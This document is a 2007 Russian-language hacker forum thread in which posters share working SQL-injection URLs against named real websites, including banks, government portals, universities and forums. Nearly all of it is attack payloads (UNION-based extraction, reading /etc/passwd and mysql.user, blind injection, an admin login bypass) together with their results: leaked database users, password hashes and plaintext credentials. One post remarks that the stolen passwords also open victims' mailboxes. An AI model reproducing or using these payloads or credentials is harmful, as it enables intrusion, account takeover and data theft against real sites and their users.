carlo.barrettara@impact.org:47ffb440cc2afb7bba618a 02bd25741e
adam:f5489f1da0df19ee7ec09eb721501c3e
wilson:05199deca16614131327f2c3fea9031c
_http://www.basketball.com.np/news.php?id=-22+union+select+1,2,concat(username,0x3a,password) ,4,5+from+user
admin:e73833d10128caa0ecde2964b0323522 hash md5()
admin:dinesh1
"дефнул" http://www.basketball.com.np/news.php?id=26
скрин http://fu2reteam.org/bastetball.gif
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,database()/*
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,user()/*
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,version()/*
http://www.tete.fi/regsystem/event.php?e_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11/*tete.fi@62.73.59.250:4.0.27-standard-log:tetefi
http://www.cablemaster.ru/SHOP/shp_warlist.php?action=list&b_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0 x71),0x71)/*4.1.18-log root:*F50E7C5E4FEF168E91C3573602248FD8CA82571Ahttp ://www.ohot-prostory.ru/show_b.php?b_id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(ver sion(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24/*&type=24.1.18-log
http://www.cjes.ru/actions/action.php?p_id=-1'/**/union/**/select/**/1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3, 4,5,6,7,8,9/*4.1.18
http://afisha.newacropol.ru/showplace.php?p_id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11,12/*afisha@hosting1.atanor.ru:4.1.22-log:afisha
http://www.melan.gazinter.net/Forum/view.php?m_id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/*melandb@localhost:4.1.22-log:melan
http://www.vesakday.net/vesak50/messages_details.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9/*&trnslang=thvesak50@localhost:5.1.17-beta-log:vesak50
http://cen.iatp.org.ua/virtual/job/boardua/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5/*cen@hosting.iatp.org.ua:4.1.22:cenhttp://www.adm-km.gov.ua/forum/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5/*admkmgovua@localhost:4.0.27:admkmgovua
0nep@t0p
18.10.2007, 18:59
Банк "Объединенный Капитал"
http://www.okbank.ru/index.php?p=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13, 14,15/*
Version: 4.1.20-lk-log
User: okbankru_site@localchost
ankil.ru
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,concat(username,0x2F,password),3 ,4,5,6,7,8,9,10,11,12,13+from+dokeos_main.user+lim it+0,1/*
логин\хеш
Еще есть таблица юзеров форума itaf_user в базе ita-forum, но запрос к ней выводит ошибку вероятно из-за тире в имени базы. Что с этим делать не знаю. Подскажите кто знает
groundhog
18.10.2007, 19:14
С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
С чего ты взял что из-за тире? Скорее всего прав нету для доступа к этой таблице.
Может и так, но на скуль
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +ita-forum.itaf_user/*
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3
------------------------------------------------------------------
groundhog
19.10.2007, 14:53
http://www.operator.vesti.ru/
Слепой SQL-Injection с фильтруемой кавычкой на сайте информационного агентства "ВЕСТИ". В Oracle имеется куча таблиц, куча схем, коммерческая информация... В общем очень большой объём. Вникать что к чему не было времени. Кому интересно - разбирайтесь. Атака была начата с поддомена чтобы не светиться особо с багой.
По характерному поведению удалось выяснить, что там крутится Oracle:
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=1+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=2+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=3+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=4+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=5+--+
Oracle9i Enterprise Edition Release 9.2.0.4.0 - 64bit Production
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Solaris: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+USER,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+DUAL+--+
Пользователь, от которого работает пага: www
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.UN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,USERNAME+UN +FROM+ALL_USERS)+T+WHERE+R=X+--+
Можем посмотреть других порегеных пользователей: UTRO, RTRSALE, CULTTV, CULTRADIO, CULTGDRZ, RADIORUS, CULTCORP, CAMERAMAN, AGENCY, RMANCAT, EXPORTER, WWW, SSL, BVB, ALINA, NIKOLAEVA, OPERATOR, LOADER, KIRA_CH, NEWSUN, GENE, BELKINA, ANGELINA, IGRITSKY, BABINTSEVA, BEREZHANSKII, LOGUNOV, PRIOROV, BIRD, FISHER, RYABOVA, ANDREEVA, MALASH, TITOVA, YUDINA, ELIAS, TRAVINSKAYA, SKOPINCEVA, ARTUR, DENIS и т.д.
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN||CHR(32)||CHR(45)||CHR(32)|| T.O,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+F ROM+(SELECT+ROWNUM+R,TABLE_NAME+TN,OWNER+O+FROM+AL L_TABLES)+T+WHERE+R=X+--+
Смотрим таблиц и овнеров таблиц. Не забываем, что наш овнер - www
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,TABLE_NAME+ TN+FROM+ALL_TABLES+WHERE+OWNER=CHR(..)||...||CHR(. ..))+T+WHERE+R=X+--+
Можем смотреть таблицы по определённому овнеру. Овнера разумеется посимвольно заворачиваем в CHR().
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.CN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+COLUMN_NAME+FROM+USE R_TAB_COLUMNS+WHERE+TABLE_NAME=CHR(70)||CHR(85)||C HR(83)||CHR(69)||CHR(82)||CHR(83))+T+WHERE+R=X+--+
Так можно смотреть имена полей таблиц на примере таблицы FUSERS.
Для любителей джаза
код:
http://www.souljazzrecords.co.uk/releases/?id=4973+union+select+1,concat(password,0x3a,email ),3,4,5,6,7,8,9,10,11,12,13,14+from+accounts+limit +3907,1/*
в поле логина вводить емейл
p.s в большинстве случаев пароли так-же подходят к почтовым ящикам ;)
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=@ @version--Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Выводим таблицу где есть колонка password
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+top+1+ table_name+from+information_schema.columns+where+c olumn_name+like+'password')--Нужная таблица - users =)
Узнаём имена колонок
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+ top+1+column_name+from+information_schema.columns+ where+table_name='users'+and+column_name+not+in+(' id','status','registrationDate','lastVisitDate','d enyAccess','hidden','days','pages','lockoutCnt','l ockoutDT','login','password','firstName','middleNa me','lastName','shortName','longName','ip','email' ,'phone','fax',%20'address'%20,'organization','dep artment','position'%20,'certCN','certData','certSt ate','denyDate','denyReason','description'))-- На этом, пожалуй, остановимся =))
http://www.elporvenir. com.mx/avisos_cat.asp? cat_id=1+or+1=@@version--http://www.cap.edu.mx /Content.aspx? ID=1+or+1=@@version--http://www.correo-gto.com.mx /notas.asp?id= 1+or+1=@@version--http://www.tashop.ru /order/frame.asp?id= 1+or+1=@@version--
0nep@t0p
19.10.2007, 18:01
Северо-Восточный Инвестиционный Банк
http://www.svib.ru/ru/news/index.php?id=-18+union+select+1,2,3,VERSION(),5,6,7 ,8,9,10/*
User: svib_www1@v52.valuehost.ru
Version: 4.0.27-max-log
Heavy Metal
19.10.2007, 18:24
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632 F706173737764),9/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,Userna me,userpass),9+from+hpsas_recsports.Tigeradmin_Use rs/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user,p assword),9+from+mysql.user/*
http://www.essor.gov.ml/cgi-bin/view_article.pl?id=-1+union+select+1,user,password,4,5,6,7,8,9+from+my sql.user--
http://www.gelyon.ru/news.php?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6/*
4.0.26/wwwgelyonru/gelyon@box.hc.ru
http://www.head-hunting.ru/z_parser.php?base_name=headhunting_second&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.1.21-log/db00084672/00084672@localhost
http://www.solange.ru/gallery/show.phtm?s=14&z=0&t=-1+union+select+concat(version(),0x2F,database(),0x 2F,user()),2,3,4,5,6,7,8,9,10/*
4.1.21-standard/intermoda/intermoda@83.69.224.34
http://www.chernomor.com/vzrosltours.php?tp=1&obj=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,d atabase(),0x2F,user()),8,9,10/*
4.1.22-standard/chernomo_main/chernomo_main@localhost
http://fest.camps.su/event.php?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4/*
4.1.21-standard-log/campssu_main/campssu_user@localhost
http://www.monbat.com/index.php?l_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4/*&change_lang=yesDOTSTUDIO@LOCALHOST:5.0.45-LOG:WEBhttp://www.oursportscentral.com/services/maps/largemap.php?l_id=-1'+union+select+1,2,3,concat(user(),0x3a,version() ,0x3a,database()),5/*oursport_public@localhost:4.1.20-log:oursport_oschttp://www.rentayacht.gr/location.php?l_id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(v ersion(),0x71),0x71),7,8,9,10,11/* http://www.oli-lacke.de/firma.php?m_id=1&l_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database()),8/*&lang=ruftp33970@manganese.webpack.hosteurope.de:5. 0.32-Debian_7etch1~bpo.1-log:oli_lacke_dehttp://www.ntnui.no/ogruppa/paamelding/paameldingsliste.php?l_id=9999+union+select+1,2,3, 4,concat(user(),0x3a,version(),0x3a,database()),6, 7,8,9,10,11,12,13,14,15,16/*ogruppa_db@textus8.itea.ntnu.no:4.0.18-Max:ogruppa_db
_http://www.ppckernel.org/tree.php?id=-3+union+select+1,concat_ws(0x3a,name,pass,hostname ),3+from+buildhosts
dev:Jahdeha5:dev.build.ppckernel.org
hercules:hohKie4r:hercules.xorsis.com
hermes:Chofei5w:hermes.ppckernel.org
m2:yie7Phoi:m2.bccd.cluster.earlham.edu
c15:lohcooD2:c15.cluster.earlham.edu
acl2:eeceaZ8u:acl2.cs.earlham.edu
tobias:tmb2h3a:tobias.cluster.earlham.edu
hermes64:Chofei5w:hermes.ppckernel.org
_http://www.dccentralkitchen.org/program.php?id=3+union+select+1,username,password, 4,5,6+from+users
admin:c84258e9c39059a89ab77d846ddab909 мд5()
admin:admin2
http://www.infohotel.ru/hotel.php?district=0&subway=0&room=0&price=0&search=2&page=0&id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user())/*
5.0.27/petroholru_info/petroholru@81.177.16.81 доступ к information_schema есть. ничего толкового не нашел
http://sovetnik-n.spb.ru/shownews.php?id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user()),5,6,7,8,9,10/*
4.1.20/sovetnik_n/sovetnik_n@localhost
Elvis000
20.10.2007, 09:15
Всероссийский туроператор свадебных путешествий
http://www.pssp.ru/services.php?s=999999999999+union+select+1,2,AES_D ECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7, 8,9,10,11,12,13,14,15,16/*
юзер:dbu_galeeva_1@192.168.3.74
база:db_galeeva_1
версия:4.1.18
http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,LOAD_FILE('/etc/passwd'),3/*
http://gostorgi.ru/z/tenders.php?tt=9999&rc='+union+select+1,2,user,password+from+mysql.use r/*
1. root — 72f840f85cf3bb40
2. gostorgi — 72f840f85cf3bb40
Red_Red1
20.10.2007, 12:34
2 ElteRUS
По поводу http://www.infohotel.ru
Тут есть более серьезная иньекция. http://www.infohotel.ru/admin/ в поле логин пишем 1' or 1=1/* в поле пароль любое. Мы в админке...
доступ к information_schema есть. ничего толкового не нашел
Незнаю как ты но я нашел таблицу spb_users, в ней поля username, password, там значения
username-admin
password-3fe4220069643d6d
Сильно подозреваю что это для входа в админку :)
Но ввиду 1' or 1=1/* становиться неактуальным, тем более что хеш я не расшифровал.
blackybr
20.10.2007, 17:06
http://www.fnews.ru/archive.php?s=news&id=-1+union+select+1,2,3,4,concat(username,char(64),us er_password,0x25,user_email),6,7,8,9,10,11,12+from +phpbb_users+limit+1,1/*
http://www.bsu.edu.ru/utils/download.asp?idf=1+and+1=@@version--
http://www.adamproject.net/dispositif.php?id_j=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7/*adam@localhost:5.0.32-Debian_7etch1-log:adam
http://lesminots.com/resume0304.php?id_j=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/*ocblklesmin@10.0.64.33:5.0.26-log:ocblklesmin
http://www.bonus33.pl/oferta.php?id_z=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database())/*poczta_bonus@localhost:5.0.33-log:poczta_bonus http://www.tswisla.pl/wislamcarthur/inc/zawodnik.php?id_z=-1+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10/*5.0.24-Debian_0.dotdeb.0-log
[53x]Shadow
20.10.2007, 21:03
MySQL 4.x.x.
http://spacegrant.nmsu.edu/isps/page.php?num=-6'+union+select+1,2,user(),4,5/*
MySQL 3.x.x.
http://www.auburn.edu/oit/oitnews/article.php?num=57+/*!40000+and+0+*/
-MoLoToK-
21.10.2007, 01:27
ФК Химки http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13/*
fckhimki_new1@v2.valuehost.ru
Версия 4.0.27-max-log
ФК Торпедо
http://www.torpedo.ru/gb/comments.php?id=1+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13+from+news/*
Интернет-провайдер в Тушино
http://tushino.com/?r=9999&id=-1'/**/union/**/select/**/0,1,2,3,4,5,6,user,8,9,password,11,12,13,14,15/**/from/**/mysql.user/*
root;396c55134cded03d
4.0.20-log
fobo.ru
http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(version(),0x2F,database (),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52/*
5.0.45-Dotdeb_0.dotdeb.0-log/fobo/fobo@localhost
http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(username,0x2F,password, 0x2F,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52+from+user+limit+10000,1/*
имя\хеш\мейл 71530 участников )))
Shadow']
MySQL 3.x.x.
http://www.auburn.edu/oit/oitnews/article.php?num=57+/!*40000+and+0+*/
тогда уж так:
http://www.auburn.edu/oit/oitnews/article.php?num=57/*!40000+a'nd+0+*/
http://www.vive.gob.ve/programas.php?id_p=-1+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71)/*4.1.11-Debian_4sarge7-loghttp://www.fitologica.it/indicazioni.php?id_p=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,ve rsion(),0x3a,database()),9,10,11,12,13,14,15,16/*fitologica_it@localhost:4.1.21:fitologica_ithttp://www.undergroundkiteboards.com/detail_product.php?id_p=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6/*undergro@202.191.42.50:4.0.27-standard-log:undergrohttp://www.undergroundkiteboards.com/detail_product.php?id_p=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6+fr om+user+limit+0,1/*dd:d adrian:bernie12 aaron:as7155ashttp://www.brightstar-hid.com/product_info_e.php?UID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat(user() ,0x3a,version(),0x3a,database()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*brightstar@localhost:5.0.22:brightstar_com_twhttp ://voyag-lux.ru/chapter28.html?uid=-1+union+select+1,aes_decrypt(aes_encrypt(user,0x71 ),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0 x71),5,6,7+from+mysql.user/*
kazan.ws
http://kazan.ws/cgi-bin/republic/viewDG.pl?a=fa&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7,8,9,10,11/*
4.0.26/kazan/postcards@192.168.1.15
http://kazan.ws/cgi-bin/republic/viewDG.pl?a=fa&id=-1+union+select+1,2,concat(name,0x2F,password),4,5, 6,7,8,9,10,11+from+users+limit+1,1/*
имя/пароль
123/123
website-security-software
https://www.website-security-software.com/portfolio-view.asp?cmd=view&ref=1%20and%201=convert(int,db_name())--
showcase.ru
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user()),2/*
5.0.45-log/u17392/u17392@10.10.10.208
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(admin,0x2F,admin_pw,0x2F,adm in_email)),2+from+phpads_config/*
admin/070d140eab0b74231c3a7fdaef1dea1b/troff@showcase.ru
Таблица phpbb_users
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(0x5B,username,0x2F,user_pass word,0x2F,user_icq,0x5D),2+from+phpbb_users/*
имя/хеш/уин
Таблица sziget_phpbb_users
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(0x5B,username,0x2F,user_pass word,0x2F,user_icq,0x5D),2+from+sziget_phpbb_users/*
имя/хеш/уин
Бывает, что если сразу грузить ссылку со скулей получеам чистый экран с надписью Oops!!! . Если же выполнять скулю поэтапно с ссылки-первоисточника то все работает
Две интересные инъекции:
http://www.posarellivillas.com/it/testimonials.php?start_limit=0&length_limit=5&sort_type=DESC&sort_value=(select+if(ascii(substring(version(),1, 1))=53,propertyid,city))http://imoti.bulgaria-web-developers.com/property-for-sale.php?order=-id*(ascii(substring(version(),1,1))=53)+DESC&page_number=30&type=&location=
как видно везде 5-я версия мускула
кто первый скажет в чем прикол, поставлю ++
(репа должна быть меньше 100)
ответы мне в личку
МУЗЫКА
код:
http://www.intenserecords.co.uk/news.php?id=-780+union+select+1,2,3,concat(id,0x3a,name,0x3a,pa ssword,0x3a,email),5+from+users+limit+1258,1/*
0nep@t0p
22.10.2007, 11:55
Городской совет Новосибирска
http://www.gorsovet.novo-sibirsk.ru/?current=127&nid=-1006+union+select+AES_DECRYPT(AES_ENCRYPT(user,0x7 1),0x71),AES_DECRYPT(AES _ENCRYPT(password,0x71),0x71),3,4,5+from+mysql.use r/*
User: root@localhost
Version: 4.1.9
Username: root
Hash: EC91857AA1C8BFF0FCAE9AD2D5E8B6D89CFB3316
Power of metal
Вообще-то сайт - один сплошной phpBB форум, который админы не патчили давненько, бага в нем еще 2004 года...
http://powerofmetal.dff.ru/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_passwo rd%20FROM%20phpbb_users%20LIMIT%201,999/*
User: helloween@localhost
Version: 4.0.24_Debian-10sarge1-log
Для работы скули нуно зарегится на форуме
PhpBB admin name: Alex
PhpBB admin hash: 687f270ddf67dd0bb8185edfef3fe4e1
Через подмену куков становимся админами
-=lebed=-
22.10.2007, 15:00
Уязвимость в BBPortalS <=2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием tnews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Поиск в гугл: inurl:"tnews.php?op"
Пример:
_www.actupix.net
Скуль:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(version(),0x3a,use r(),0x3a,database()),7,8,9,10,11,12/*
Смотрим названия таблиц, меняя параметр limit:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 +from+information_schema.tables+limit+0,1/*
CHARACTER_SETS
COLLATIONS
----------
zypibot
85 таблиц.
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 +from+information_schema.tables+limit+84,1/*
Колонки:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,column_name,7,8,9,10,11,1 2+from+information_schema.columns+limit+0,1/*
Таблица users:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7 ,8,9,10,11,12+from+users/*
Админ (меняем limit и смотрим других юзеров):
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7 ,8,9,10,11,12+from+users+limit+1,1/*
Admin:418685582e6f6e65516b90feaeab6518
Patrice:418685582e6f6e65516b90feaeab6518
PS Есть эксплоит (http://milw0rm.com/exploits/4550)
http://www.ewebarchitecture.com/tip.php?id=-292+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+admin/*
Помагите раскрутить ;)
-=lebed=-
22.10.2007, 17:26
Смотрим таблицы:
_http://www.ewebarchitecture.com/tip.php?id=-292+UNION+SELECT+1,2,3,4,5,6,table_name,8,9+from+i nformation_schema.tables+limit+0,1/*
ЗЫ всё аналогично посту выше... (57 таблиц)
ЛОгин пароль не могу найти ;)
Таблицы вынул ...
И вот ещё
http://www.indonesia-ottawa.org/information/details.php?type=speech&id=-141+UNION+SELECT+1,2,concat(char(64,64),user,char( 58),password,char(64,64)),4,5,6,7,8,9,10,11,12,13, 14,15,16+FROM+mysql.user/*
Нет вывода ХЭША пароля ...
И вот ещё
Нет вывода ХЭША пароля ...http://www.indonesia-ottawa.org/information/details.php?type=speech&id=-141+UNION+SELECT+1,2,concat(char(64,64),user,char( 58),password,char(64,64)),4,5,6,7,8,9,10,11,12,13, 14,15,16+FROM+mysql.user+limit+1,2/* итд лимитом 2,2 3,2...
А рут все равно не показывает хэш ...
http://www.shacknews.com/featuredarticle.x?id=-520+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33+FROM+accounts/*
Помагите вывести поля ICQ и Password .
У меня сайт еле загружается ...
Спасибо ..
halkfild
22.10.2007, 23:01
ru-board.com
яндекс Тиц - 1300
Google: PR - 4http://ru-board.com/new/article.php?sid=61'
http://ru-board.com/new/article.php?sid=61+and+1=1/*'
http://ru-board.com/new/article.php?sid=61+order+by+1/*'
нормального вывода нет мона попробовать раскрутить как блинд
http://ru-board.com/new/article.php?sid=61+and+substring(version(),1,1)=4/*'
з.ы. случайно под руку попалась)) специально не смотрел
з.ы.тут такое же
http://ru-board.com/new/print.php?sid=61+and+substring(version(),1,1)=4/*'
guest3297
22.10.2007, 23:28
http://ru-board.com/new/print.php?sid=null+union+select+1,2,3,4,5,6/*
http://www.ofmycity.com/afisha/?a=seeitem&id=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,d atabase(),0x2F,user()),8,9/*
5.0.37-log/afisha/afishamoder@localhost
http://brand.xab.info/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x2F ,database(),0x2F,user()),9,10,11,12,13,14,15,16,17 ,18,19,20,21/*
4.0.24/xabinfo/portal@localhost
http://www.bodybuilding.spb.ru/index.php?lan=ru&cont=news&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.0.20-standard/whbody1/whbody1@localhost
http://www.zyll.net/news.php?id=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7/*
4.1.22-log/freemp3_slovo/freemp3_slovo@goliaph
-MoLoToK-
23.10.2007, 01:38
http://www.llatalent.com/current/index.php?current_id=999999+union+select+1,2,conca t(version(),0x2F%20,database(),0x2F,user()),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18/*
4.0.27-standard/admin_llatalent_com/dbm.llatalent.com@web175.megawebservers.com
0nep@t0p
23.10.2007, 13:41
Промторгбанк
http://www.ptbank.ru/doc.php?id=-2+union+select+1,2,user,password,4,6,7,8+from+mysq l.user+limit+0,1/*
Version: 4.0.24-log
User: wechsel@localhost
Username (mysql): root
Password (mysql): 5be593ab2a724d73: q1w2e3r4
Internet Society Belgium
http://www.isoc.be/news.php?ID=-1+union+select+concat(version(),0x3a,database(),0x 3a,user())/*
5.0.32-Debian_7etch1:isocbe:isoceccorg@localhost
171 таблица:
http://www.isoc.be/news.php?ID=-1+union+select+table_name+from+information_schema. tables+limit+171,1/*
Есть несколько интересных таблиц (cms_users, phpbb_users, tbllogins, tblusers, isoc_users, phpbb_nonsenseusers),
но смог подобрать только одно поле username из таблицы tblusers.
kubmarket.ru
http://www.kubmarket.ru/news/view/?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.1.22/wwwkubmarketru/kubmarke@localhost
http://www.kubmarket.ru/news/view/?id=-1+union+select+1,2,concat(userlogin,0x2F,userpassw ord,0x2F,useremail),4,5,6,7+from+users+limit+0,1/*
логин/пароль/мейл не хеш.
Red_Red1
23.10.2007, 15:26
2 fRg
http://www.isoc.be/news.php?ID=-1+union+select+column_name+from+information_schema .columns%20where%20table_name=CHAR(116,98,108,117, 115,101,114,115)%20limit%202,1/*
Не нужно ничего "подбирать" это пятая версия мускула, значит можно все увидеть :)
При этом запросе мы видим что есть поле Paswoord (именно так 2 буквы "о").
Аналогично смотрим другие таблицы и столбики в них.
sexarea.ru
http://www.sexarea.ru/news/detail.php?news=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3/*
5.1.20-beta/sexarea_usexar11/sexarea_usexar11@localhost
http://www.sexarea.ru/news/detail.php?news=-1+union+select+1,concat(username,0x2F,user_passwor d,0x2F,user_icq),3+from+zf_users/*
логин/хеш/уин
http://www.av d.org.ua/viewdetails.php?id=-2019+UNION+SELECT+1,2,3,4,conc at(user(),0x3a,database(),0x3a,version()),6,7,8,9, 10,11,12,13,14,15/*
Есть таблица user и поле username
Вот это совпало =) минуту назад хекал этоже http://studyport.info/viewdetails.php?id=-1+union+select+1,concat(username,0x3a,passwd,0x3a, email),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user+l imit+101,1/* подобрал методом тыка :D
Код:
http://www.livemusicdirect.co.uk/bands.php?band_id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(user_id,0x3a,username,0x3a,password)+from+user_ login+limit+684,1/*&start=0
код:
http://www.livemusicdirect.co.uk/bands.php?band_id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a,user_id,status_id,surname,forename,tel, mobile,email,userType,pass)+from+user+limit+700,1/*&start=0
rossoshweb.ru
http://www.rossoshweb.ru/modules/news/news.php?id_news=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7,8,9,10/*
5.0.45-log/u66116_2/u66116@10.10.223.237
